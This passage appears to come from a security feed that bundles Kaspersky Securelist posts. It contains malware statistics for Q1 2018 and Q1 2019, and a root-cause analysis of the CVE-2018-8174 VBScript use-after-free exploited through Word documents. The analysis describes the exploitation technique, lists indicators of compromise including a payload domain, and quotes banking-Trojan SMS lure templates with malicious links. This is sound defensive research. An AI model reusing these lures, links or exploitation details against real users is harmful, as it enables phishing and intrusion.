banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "modified": "2018-05-14T10:00:30", "published": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-10T11:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2017-0199", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-8174"], "description": "\n\nIn late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.\n\n### **Searching for the zero day**\n\nOur story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133136/180508-the-king-is-dead-cve-18-1.png>)\n\n_Virustotal scan results for CVE-2018-8174_\n\nAfter the malicious sample was processed in our [sandbox system](<https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox>), we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. Let's take a look at the full infection chain:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133144/180508-the-king-is-dead-cve-18-2.png>)\n\n_Infection chain_\n\nThe infection chain consists of the following steps:\n\n * A victim receives a malicious Microsoft Word document.\n * After opening the malicious document, a second stage of the exploit is downloaded; an HTML page containing VBScript code.\n * The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.\n\n### **Initial analysis**\n\nWe'll start our analysis with the initial Rich Text Format (RTF) document, that was used to deliver the actual exploit for IE. It only contains one object, and its contents are obfuscated using a known obfuscation technique we call \"[nibble drop](<https://securelist.com/disappearing-bytes/84017/>)\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133151/180508-the-king-is-dead-cve-18-3.png>)\n\n_Obfuscated object data in RTF document_\n\nAfter deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a [URL Moniker](<https://msdn.microsoft.com/ru-ru/en-en/library/windows/desktop/ms688580\\(v=vs.85\\).aspx>) CLSID. Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler ([CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133158/180508-the-king-is-dead-cve-18-4.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133205/180508-the-king-is-dead-cve-18-5.png>)\n\n_URL Moniker is used to load an IE exploit_\n\nWith the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes; the Content-Type HTTP header in the server's response being one of them. Because the default handler for the \"application/hta\" Content-Type is mshta.exe,it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.\n\nHowever, if we follow the embedded URL in the latest exploit, we can see that the content type in the server's response is not \"application/hta\", which was a requirement for CVE-2017-0199 exploitation, but rather \"text/html\". The default OLE server for \"text/html\" is mshtml.dll, which is a library that contains the engine, behind Internet Explorer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133212/180508-the-king-is-dead-cve-18-6.png>)\n\n_WINWORD.exe querying registry for correct OLE server_\n\nFurthermore, the page contains VBScript, which is loaded with a safemode flag set to its default value, '0xE'. Because this disallows an attacker from directly executing a payload, as was the case with the HTA handler, an Internet Explorer exploit is needed to overcome that.\n\nUsing a URL moniker like that to load a remote web page is possible, because Microsoft's patch for Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) introduced an activation filter, which allows applications to specify which COM objects are restricted from instantiating at runtime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133220/180508-the-king-is-dead-cve-18-7.png>)\n\n_Some of the filtered COM objects, restricted from creating by IActivationFilter in MSO.dll_\n\nAt the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. TheMSHTML CLSID ({{25336920-03F9-11CF-8FD0-00AA00686F13}}) is not in the list, which is why the MSHTML COM server is successfully created in Word context.\n\nThis is where it becomes interesting. Despite a Word document being the initial attack vector, the vulnerability is actually in VBScript, not in Microsoft Word. This is the first time we've seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. This technique allows one to load and render a web page using the IE engine, even if default browser on a victim's machine is set to something different.\n\nThe VBScript in the downloaded HTML page contains both function names and integer values that are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133228/180508-the-king-is-dead-cve-18-8.png>)\n\n_Obfuscated IE exploit_\n\n### **Vulnerability root cause analysis**\n\nFor the root cause analysis we only need to look at the first function ('TriggerVuln') in the deobfuscated version which is called right after 'RandomizeValues' and 'CookieCheck'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133234/180508-the-king-is-dead-cve-18-9.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133240/180508-the-king-is-dead-cve-18-10.png>)\n\n_Vulnerability Trigger procedure after deobfuscation_\n\nTo achieve the desired heap layout and to guarantee that the freed class object memory will be reused with the 'ClassToReuse' object, the exploit allocates some class objects. To trigger the vulnerability this code could be minimized to the following proof-of-concept (PoC):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133249/180508-the-king-is-dead-cve-18-11.png>)\n\n_CVE-2018-8174 Proof Of Concept_\n\nWhen we then launch this PoC in Internet Explorer with page heap enabled we can observe a crash at the OLEAUT32!VariantClear function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133256/180508-the-king-is-dead-cve-18-12.png>)\n\n_Access Violation on a call to freed memory_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133304/180508-the-king-is-dead-cve-18-13.png>)\n\n_Freed memory pointer is reused when the second array (ArrB) is destroyed_\n\nWith this PoC we were able to trigger a Use-after-free vulnerability; both ArrA(1) and ArrB(1) were referencing the same 'ClassVuln' object in memory. This is possible because when \"Erase ArrA\" is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.\n\nIt checks that the pointer to a [tagSafeArray structure](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms221482\\(v=vs.85\\).aspx>) is not NULL and that its reference count, stored in the cLocks field is zero, and then continues to call ReleaseResources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133315/180508-the-king-is-dead-cve-18-14.png>)\n\n_VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object_\n\nReleaseResources, in turn will check the fFeatures flags variable, and since we have an array of VARIANTs, it will subsequently call VariantClear; a function that iterates each member of an array and performs the necessary deinitialization and calls the relevant class destructor if necessary. In this case, VBScriptClass::Release is called to destroy the object correctly and handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133323/180508-the-king-is-dead-cve-18-15.png>)\n\n_Root cause of CVE-2018-8174 - 'refCount' being checked only once, before TerminateClass function_\n\nThis ends up being the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and actually is, in the PoC) incremented in an overloaded TerminateClass function, no checks will be made before finally freeing the class object.\n\n[Class_Terminate](<https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed>) is a deprecated method, now replaced by the 'Finalize' procedure. It is used to free acquired resources during object destruction and is executed as soon as object is set to nothing and there are no more references to that object. In our case, the Class_Terminate method is overloaded, and when a call to VBScriptClass::TerminateClass is made, it is dispatched to the overloaded method instead. Inside of that overloaded method, another reference is created to the ArrA(1) member. At this point ArrB(1) references ArrA(1), which holds a soon to be freed ClassVuln object. \n\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133332/180508-the-king-is-dead-cve-18-16.png>)\n\n_Crash, due to calling an invalid virtual method when freeing second object_\n\nAfter the Class_Terminate sub is finished, the object at ArrA(1) is freed, but ArrB(1) still maintains a reference to that freed class object. When the execution continues, and ArrB is erased, the whole cycle repeats, except that this time, ArrB(1) is referencing a freed ClassVuln object, and so we observe a crash when one of the virtual methods in the ClassVuln vtable is called.\n\n### **Conclusion**\n\nIn this write up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting Use-After-Free vulnerability that was possible due to incorrect object lifetime handling in the Class_Terminate VBScript method. The exploitation process is different from what we've seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332) as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of scope of this article.\n\nWith CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit in Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as It allows you force IE to load ignoring the default browser settings on a victim's system.\n\nWe expect this vulnerability to become one of the most exploited in the near future, as it won't be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying latest security updates, and using a security solution with [behavior detection capabilities](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>).\n\nIn our opinion this is the same exploit which Qihoo360 Core Security Team called \"Double Kill\" in their [recent publication](<https://weibo.com/ttarticle/p/show?id=2309404230886689265523>). While this exploit is not limited to browser exploitation, it was reported as an IE zero day, which caused certain confusion in the security community.\n\nAfter finding this exploit we immediately shared the relevant information with Microsoft and they confirmed that it is in fact [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174>), and received an acknowledgement for the report.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/10092043/180508-the-king-is-dead-cve-18-20.png>)\n\n_This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com_\n\n### **Detection**\n\nKaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:\n\n * HEUR:Exploit.MSOffice.Generic \u2013 RTF document\n * PDM:Exploit.Win32.Generic - IE exploit \u2013 detection with [Automatic Exploit Prevention technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/automatic-exploit-prevention-aep>)\n * HEUR:Exploit.Script.Generic \u2013 IE exploit\n * HEUR:Trojan.Win32.Generic - Payload\n\n### **IOCs**\n\n * b48ddad351dd16e4b24f3909c53c8901 - RTF document\n * 15eafc24416cbf4cfe323e9c271e71e7 - Internet Explorer exploit (CVE-2018-8174)\n * 1ce4a38b6ea440a6734f7c049f5c47e2 - Payload\n * autosoundcheckers[.]com", "modified": "2018-05-09T06:00:56", "published": "2018-05-09T06:00:56", "id": "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "href": "https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/", "type": "securelist", "title": "The King is dead. Long live the King!", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T14:29:14", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking 